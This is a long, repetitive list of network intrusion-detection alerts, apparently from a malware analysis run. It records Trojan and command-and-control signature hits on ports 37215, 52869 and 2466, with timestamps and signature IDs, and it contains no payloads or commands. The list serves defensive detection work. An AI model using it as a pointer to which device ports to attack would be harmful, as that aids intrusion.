                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.661808+0200
                      SID:2835222
                      Source Port:36536
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.435833+0200
                      SID:2835222
                      Source Port:57502
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.234188+0200
                      SID:2835222
                      Source Port:54070
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.652845+0200
                      SID:2835222
                      Source Port:57096
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.375075+0200
                      SID:2835222
                      Source Port:52450
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.800833+0200
                      SID:2027339
                      Source Port:51696
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.203030+0200
                      SID:2835222
                      Source Port:34126
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.313692+0200
                      SID:2027339
                      Source Port:41386
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.514803+0200
                      SID:2835222
                      Source Port:34808
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.185191+0200
                      SID:2027339
                      Source Port:55894
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:04.989471+0200
                      SID:2027339
                      Source Port:59800
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.848902+0200
                      SID:2027339
                      Source Port:47614
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.065822+0200
                      SID:2835222
                      Source Port:37860
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.002255+0200
                      SID:2027339
                      Source Port:59450
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.164966+0200
                      SID:2835222
                      Source Port:60312
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.227759+0200
                      SID:2835222
                      Source Port:40646
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.138831+0200
                      SID:2027339
                      Source Port:38540
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.186953+0200
                      SID:2835222
                      Source Port:37622
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.083467+0200
                      SID:2835222
                      Source Port:54504
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.023643+0200
                      SID:2027339
                      Source Port:57946
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.224296+0200
                      SID:2835222
                      Source Port:37624
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.835540+0200
                      SID:2027339
                      Source Port:52660
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.661486+0200
                      SID:2835222
                      Source Port:52086
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.842478+0200
                      SID:2027339
                      Source Port:60858
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.821142+0200
                      SID:2027339
                      Source Port:51596
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.378526+0200
                      SID:2835222
                      Source Port:32888
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:23.594181+0200
                      SID:2027339
                      Source Port:54124
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:04.986374+0200
                      SID:2027339
                      Source Port:33896
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.211994+0200
                      SID:2835222
                      Source Port:50524
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.307062+0200
                      SID:2835222
                      Source Port:48608
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.668534+0200
                      SID:2027339
                      Source Port:50582
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.186953+0200
                      SID:2835222
                      Source Port:58932
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.068477+0200
                      SID:2835222
                      Source Port:55632
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:09.027075+0200
                      SID:2027339
                      Source Port:43632
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.245977+0200
                      SID:2027339
                      Source Port:44980
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.612017+0200
                      SID:2835222
                      Source Port:36772
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.088869+0200
                      SID:2835222
                      Source Port:54992
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.455768+0200
                      SID:2027339
                      Source Port:41252
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.527399+0200
                      SID:2027339
                      Source Port:52042
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.164966+0200
                      SID:2835222
                      Source Port:59582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.495841+0200
                      SID:2835222
                      Source Port:51548
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.312878+0200
                      SID:2835222
                      Source Port:43126
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.566537+0200
                      SID:2027339
                      Source Port:41034
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.636409+0200
                      SID:2027339
                      Source Port:54970
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.307325+0200
                      SID:2027339
                      Source Port:38296
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.810328+0200
                      SID:2027339
                      Source Port:50442
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.397151+0200
                      SID:2835222
                      Source Port:43520
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.231512+0200
                      SID:2835222
                      Source Port:58330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.267821+0200
                      SID:2027339
                      Source Port:55002
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.219743+0200
                      SID:2835222
                      Source Port:59916
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.175742+0200
                      SID:2835222
                      Source Port:32798
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.223718+0200
                      SID:2835222
                      Source Port:39668
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.654988+0200
                      SID:2835222
                      Source Port:40002
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:05.120492+0200
                      SID:2027339
                      Source Port:56952
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.243707+0200
                      SID:2027339
                      Source Port:56566
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.658630+0200
                      SID:2835222
                      Source Port:47118
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.219743+0200
                      SID:2835222
                      Source Port:40010
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.419347+0200
                      SID:2027339
                      Source Port:33712
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.557356+0200
                      SID:2027339
                      Source Port:58484
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:56.851055+0200
                      SID:2030490
                      Source Port:32848
                      Destination Port:2466
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-20T23:01:00.651026+0200
                      SID:2835222
                      Source Port:59428
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.244103+0200
                      SID:2027339
                      Source Port:48232
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.218458+0200
                      SID:2835222
                      Source Port:49836
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:11.815818+0200
                      SID:2835222
                      Source Port:60474
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.280424+0200
                      SID:2027339
                      Source Port:47964
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.378526+0200
                      SID:2835222
                      Source Port:38000
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.170219+0200
                      SID:2835222
                      Source Port:39054
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.083467+0200
                      SID:2835222
                      Source Port:33838
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.203029+0200
                      SID:2835222
                      Source Port:56586
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.214465+0200
                      SID:2835222
                      Source Port:36066
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.527399+0200
                      SID:2027339
                      Source Port:50724
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.088423+0200
                      SID:2835222
                      Source Port:58700
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.580320+0200
                      SID:2027339
                      Source Port:52634
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:14.014458+0200
                      SID:2835222
                      Source Port:57656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.663232+0200
                      SID:2835222
                      Source Port:51534
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.309512+0200
                      SID:2835222
                      Source Port:59124
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.326551+0200
                      SID:2027339
                      Source Port:57088
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.496545+0200
                      SID:2027339
                      Source Port:49602
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.177250+0200
                      SID:2027339
                      Source Port:58548
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.723120+0200
                      SID:2027339
                      Source Port:35024
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.253167+0200
                      SID:2027339
                      Source Port:46746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.660317+0200
                      SID:2835222
                      Source Port:35438
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.660317+0200
                      SID:2835222
                      Source Port:32868
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.019040+0200
                      SID:2027339
                      Source Port:60784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.208769+0200
                      SID:2835222
                      Source Port:60908
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.219743+0200
                      SID:2835222
                      Source Port:45996
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.649623+0200
                      SID:2835222
                      Source Port:32936
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.314319+0200
                      SID:2027339
                      Source Port:52414
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.231239+0200
                      SID:2027339
                      Source Port:48310
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.203030+0200
                      SID:2835222
                      Source Port:39662
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:08.939279+0200
                      SID:2027339
                      Source Port:33890
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:11.815593+0200
                      SID:2835222
                      Source Port:33210
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:22.245977+0200
                      SID:2027339
                      Source Port:46928
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.275355+0200
                      SID:2835222
                      Source Port:52906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.811938+0200
                      SID:2027339
                      Source Port:37044
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.339510+0200
                      SID:2027339
                      Source Port:58748
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.656262+0200
                      SID:2835222
                      Source Port:59862
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.285263+0200
                      SID:2835222
                      Source Port:52728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.088423+0200
                      SID:2835222
                      Source Port:46582
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.554632+0200
                      SID:2835222
                      Source Port:40104
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.182814+0200
                      SID:2027339
                      Source Port:49282
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.648916+0200
                      SID:2835222
                      Source Port:38714
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.198290+0200
                      SID:2027339
                      Source Port:49528
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.539093+0200
                      SID:2835222
                      Source Port:41330
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.562923+0200
                      SID:2027339
                      Source Port:45156
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.858243+0200
                      SID:2027339
                      Source Port:55224
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.171003+0200
                      SID:2835222
                      Source Port:41416
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.661486+0200
                      SID:2835222
                      Source Port:52146
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.510150+0200
                      SID:2835222
                      Source Port:55906
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.201622+0200
                      SID:2835222
                      Source Port:34032
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:04.432754+0200
                      SID:2835222
                      Source Port:33920
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.599875+0200
                      SID:2835222
                      Source Port:47332
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.515380+0200
                      SID:2027339
                      Source Port:57270
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.588308+0200
                      SID:2027339
                      Source Port:59360
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.941341+0200
                      SID:2835222
                      Source Port:38424
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.208769+0200
                      SID:2835222
                      Source Port:44106
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.565849+0200
                      SID:2027339
                      Source Port:52384
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.840696+0200
                      SID:2027339
                      Source Port:54012
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.419599+0200
                      SID:2027339
                      Source Port:47142
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.285263+0200
                      SID:2835222
                      Source Port:49188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.943979+0200
                      SID:2027339
                      Source Port:41746
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.531036+0200
                      SID:2027339
                      Source Port:40650
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.300446+0200
                      SID:2027339
                      Source Port:51400
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.488326+0200
                      SID:2835222
                      Source Port:44174
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.175742+0200
                      SID:2835222
                      Source Port:57488
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.317572+0200
                      SID:2027339
                      Source Port:52638
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.184321+0200
                      SID:2835222
                      Source Port:59652
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.208769+0200
                      SID:2835222
                      Source Port:34626
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.514691+0200
                      SID:2835222
                      Source Port:59564
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.213565+0200
                      SID:2835222
                      Source Port:34754
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.136941+0200
                      SID:2835222
                      Source Port:35512
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:01.081889+0200
                      SID:2027339
                      Source Port:43466
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.648916+0200
                      SID:2835222
                      Source Port:48680
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.167729+0200
                      SID:2835222
                      Source Port:40788
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:14.169782+0200
                      SID:2030489
                      Source Port:2466
                      Destination Port:32848
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-07-20T23:01:00.663232+0200
                      SID:2835222
                      Source Port:39940
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.227759+0200
                      SID:2835222
                      Source Port:60464
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.466954+0200
                      SID:2027339
                      Source Port:52268
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.252557+0200
                      SID:2027339
                      Source Port:40882
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.827683+0200
                      SID:2027339
                      Source Port:41974
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.423367+0200
                      SID:2835222
                      Source Port:57708
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.197536+0200
                      SID:2835222
                      Source Port:56188
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.176163+0200
                      SID:2835222
                      Source Port:58944
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.648916+0200
                      SID:2835222
                      Source Port:56956
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.136941+0200
                      SID:2835222
                      Source Port:42612
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.202996+0200
                      SID:2027339
                      Source Port:34424
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.170219+0200
                      SID:2835222
                      Source Port:46354
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.137445+0200
                      SID:2835222
                      Source Port:38742
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.004535+0200
                      SID:2027339
                      Source Port:47818
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.422394+0200
                      SID:2835222
                      Source Port:47728
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:19.825974+0200
                      SID:2027339
                      Source Port:57370
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.227759+0200
                      SID:2835222
                      Source Port:54948
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.088869+0200
                      SID:2835222
                      Source Port:46656
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.545693+0200
                      SID:2835222
                      Source Port:34718
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.227541+0200
                      SID:2027339
                      Source Port:57776
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:11.816293+0200
                      SID:2835222
                      Source Port:50264
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.456312+0200
                      SID:2835222
                      Source Port:59666
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.267821+0200
                      SID:2027339
                      Source Port:52478
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:08.919725+0200
                      SID:2027339
                      Source Port:46758
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.224296+0200
                      SID:2835222
                      Source Port:52812
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.124881+0200
                      SID:2027339
                      Source Port:50118
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.661808+0200
                      SID:2835222
                      Source Port:37310
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.297902+0200
                      SID:2835222
                      Source Port:42650
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:14.013612+0200
                      SID:2835222
                      Source Port:35052
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.652845+0200
                      SID:2835222
                      Source Port:35972
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.191460+0200
                      SID:2027339
                      Source Port:35798
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:02.095698+0200
                      SID:2835222
                      Source Port:47304
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.844542+0200
                      SID:2027339
                      Source Port:56940
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:00.662826+0200
                      SID:2835222
                      Source Port:45546
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:00:59.170218+0200
                      SID:2835222
                      Source Port:52500
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:20.265368+0200
                      SID:2027339
                      Source Port:59542
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.267123+0200
                      SID:2027339
                      Source Port:60912
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:18.266144+0200
                      SID:2835222
                      Source Port:40282
                      Destination Port:37215
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:2024-07-20T23:01:21.454208+0200
                      SID:2027339
                      Source Port:35784
                      Destination Port:52869
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
